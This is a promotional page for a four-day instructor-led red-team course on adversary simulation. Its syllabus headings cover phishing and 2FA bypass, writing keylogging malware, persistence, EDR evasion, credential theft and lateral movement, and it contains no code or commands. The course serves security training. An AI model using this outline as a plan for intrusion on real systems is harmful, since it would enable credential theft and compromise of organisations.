Advanced Red teaming: weaponization & adversary Simulation
September 8-11, 2022 (4 Days Live Training)
This is a live instructor-led training that focuses on developing cyber weapons that can evade AV detection, EDR logs and forensics traces like how advanced targeted attacks do, and provide you with insights on how to improve your organization's overall detections and security posture
Advanced Red Teaming: Weaponization & Adversary Simulation is a hands-on offensive training that focuses on helping organizations battle against ever-growing targeted attacks and ransomware attacks by simulating their adversaries and put your defenses and your blue team at test to improve the organization security posture.

This training focuses on developing cyber weapons that can evade AV detection, EDR logs and forensics traces like how advanced targeted attacks do, and provide you with insights on how to improve your organization's overall detections and security posture

This training is for Security Professionals who want to expand their skills in red teaming, understand how real-world attacks look like and better protect their organizations against APT Attacks, Targeted Ransomware attacks and Fileless attacks

  • Cyber Security Professionals
  • ​Penetration Testers
  • Purple Teamers & Threat Hunters
  • Incident Handlers
  • ​SOC Analysts

We help cybersecurity professionals protect their organizations from the biggest threats they are facing and become the go-to experts in their team

The number of cyberattacks is undoubtedly on the rise, targeting government, military, public and private sectors. 

These cyber-attacks focus on targeting individuals or organizations with an effort to extract valuable information, gaining money through a ransom, or damaging their reputation. 43% of cyber attacks these organizations are facing are Advanced Malware, APT Attacks, or zero-day attacks.

With adversaries getting sophisticated, the best way to test enterprise security operations & defenses against them is through simulating their attacks, leveraging the same tactics, techniques, and procedures (TTPs).

This intensive live training will take you on a journey into the attacker mindset, we will be covering how to simulate real APT Attacks, ransomware attacks and bypasses the organization's defenses and detection systems. We craft our spear-phishing attacks, malicious documents, and our undetectable cyber weapons to bypass their defenses and test the blue team detections with real-world scenarios.

In this training, we won't be relying on commercial products instead we will be relying on open-source projects and our in-house developed tools and weapons.

The strategies, skills, and tools required to simulate real targeted attacks and harden your organization's defenses and security teams
Day 1

APT Attacks & Red Team Infrastructure on AWS

  • What is an APT Attack?
  • ​What are the Attack Stages? And what’s MITTRE ATTACK?
  • APT attack lifecycle
  • ​Examples of real-world APT attacks
  • Deep dive into the attackers' tactics, techniques, and procedures (TTPs) Using Threat Intelligence 
  • ​Understand the attackers' malware arsenal
  • ​Setting Up Your Infrastructure in the cloud
  • ​Setting up your account in AWS & Terraform
  • ​Build your network and Caldera VM in the cloud
  • ​Create Redirectors to obfuscate your C&C IP

Phishing & Social Engineering Mastery

  • Create a Phishing Platform using GoPhish & EmailGun
  • Create Your Phishing Pages using EvilGinx 2
  • Build Your Phishing plan using OSINT
  • ​Build your phishing emails templates
  • ​Bypass 2-Factor Authentication using EvilGinx 2

Initial Access: Get your foot into the organization network

  • Spearphishing with malicious document
  • Spearphishing with link
  • Spearphishing using social media
  • Advanced Execution Techniques: LNK Files
  • ​Advanced Execution Techniques: COM Objects
  • ​Write your first spear-phishing attack with a malicious document (Hands-on)
Day 2

Write Your First HTTP Malware

  • Build a Vulnerable organization in AWS
  • Connect to Caldera C2 using HTTP 
  • Implement Base64 encoding in your malware
  • Implement JSON parsing in your malware
  • ​Send victim machine information to your C&C
  • ​Receive and execute commands from Caldera
  • ​Automate command execution across multiple victims

Malware Plugin Framework Implementation

  • Add a framework for plugins with additional features
  • Add a keylogger plugin to log keystrokes and steal credentials.
  • Add commands for Caldera to download the keylogger logs

Maintaining Persistence In-Depth (Advanced Techniques)

  • Maintain Persistence in the victim machine 
  • Advanced Persistence methods
  • Disguise the malware inside a legitimate process (Malware as a DLL) 
  • Persistence through DLL Injection

Privilege Escalation Techniques

  • UAC bypass techniques 
  • ​Advanced UAC bypass techniques: Abusing Application Shimming
  • Abuse services for privilege escalation
  • Escalate to SYSTEM account.
Day 3

Defense Evasion: Malware Obfuscation

  • Malicious Documents: VBA Stomping
  • Strings Encryption
  • ​Dynamic API Loading
  • ​Hidden In Plain Sight: Malware Steganography

Defense Evasion: Network Obfuscation

  • Network Data Encryption
  • Hidden In Plain Sight 01: HTML Smuggling
  • ​Hidden In Plain Sight 02: Steganography
  • ​HTTPS Communication
  • ​Using legitimate websites for communications
  • DNS Flux and DNS over HTTPS
  • Other Protocols & Channels (ICMP, DNS)

Defense Evasion: Bypass EDRs & Behavioral-Based Detection

  • Process Injection & DLL Injection
  • Sysmon & ​EDR Bypass Techniques
  • Unhook EDR APIs
  • ​Invisible Process Injection Without Alerting EDRs
  • ​AppLocker And Application Whitelisting bypass Techniques
Day 4

Impersonating Users: Credential Theft & Token Impersonalization 

  • Credential Theft using lsass memory dump
  • Bypass lsass protection
  • Token Impersonation & Logon Types Overview 
  • Token Impersonation implementation in your malware
  • ​Steal Remote Desktop Sessions 
  • ​Lateral movement using caldera and your agent

Lateral Movements

  • NTLM Attacks: Pass The Hash
  • ​Kerberos Attacks: Pass The Ticket
  • Kerberos Attacks: Overpass The Hash
  • Silver & Golden Tickets
  • Lateral movement using Scheduled tasks
  • ​Lateral movement using Remote COM Objects
  • ​Lateral movement using WMIC & Powershell Remoting
Your Trainers

Amr Thabet

Amr Thabet is a malware researcher and an incident handler with over 10 years of experience, he worked in some of the Fortune 500 companies including Symantec, Tenable, and others. 

He is the founder of MalTrak and the author of "Mastering Malware Analysis" published by Packt Publishing.

Amr has spoken at top security conferences all around the world, including DEFCON, Hack In Paris and VB Conference. He was also featured in Christian Science Monitor for his work on Stuxnet.

His mission is to help security professionals all around the world to build their expertise in malware analysis, threat hunting, red teaming. and most importantly, protect their organization's infrastructure from targeted attacks, ransomware attacks, and APT attacks.
Muhammed Talaat
Muhammed Talaat
Muhammed Talaat is a Malware Researcher & Cybersecurity Consultant in CyShield. He has an extensive experience in malware analysis, red teaming and customized malware development for different systems.

He has done multiple researches on bypassing some of the top cybersecurity defenses including Endpoint Detection Response products (EDR) and other products

He had worked for private sectors in the field of defensive strategies and malware research

He specializes in Reverse Engineering low-level systems (Firmware , ECUs , Kernel projects ..etc) and he has a solid knowledge in Automotive Security (Car Hacking) field. 
The strategies, skills, and tools required to analyze malicious software are essential to detect, investigate and defend against such attacks.

The strategies, skills, and tools required to simulate real targeted attacks and harden your organization's defenses and security teams

  • Good IT administration background in Windows mainly (Linux is preferred) 
  • Good cybersecurity background
  • Good programming skills in C++ 
  • Laptop with minimum 8GB RAM and 60GB free hard disk space
  • ​VMware Workstation or VMware Fusion (even trial versions can be used). You can use VirtualBox or other virtualization software. However, the training will be delivered based on VMware Workstation.
  • ​Delegates must have full administrator access for the Windows operating system installed inside the VMware Workstation/Fusion.
  • ​Delegates have Microsoft Visual Studio or GNU C++ Compiler installed on their machine and their preferred Code Editor (Visual Studio or VS Code are preferred)
Note: VMware player is not suitable for this training.
WHAT materials are provided?
  • Training Prerequisite & Lab Setup Guide: a step by step guide to prepare your isolated virtualized environment for executing and analyzing malware
  • ​Malware Analysis Lab VM (Windows 7 VM) with all required tools pre-installed. It will be provided in .ova format
  • ​The labs/exercises samples and memory images.
  • ​A printed copy of mastering Malware Analysis Book
  • ​A printed copy of Malware Analysis & Reverse Engineering Workbook which includes all the exercises taught in the training with step by step solutions to them.
HOW LONG IS THE TRAINING AND WHAT's the schedule like?
The training is a total of 4 days (6 hours of workshop/day). Each day will have a schedule that looks like the following:

11:00am : Workshops Starts
2:00pm : Lunch
4:30pm : Afternoon Tea-Break (15 mins)
6:00pm : Workshops Ends (Depends on the trainers)

Mission  |  Books  |  Training  |  About Us  |  Contact

18 Garnish Square, D15, Dublin, Ireland
©2020  MalTrak - All Rights Reserved.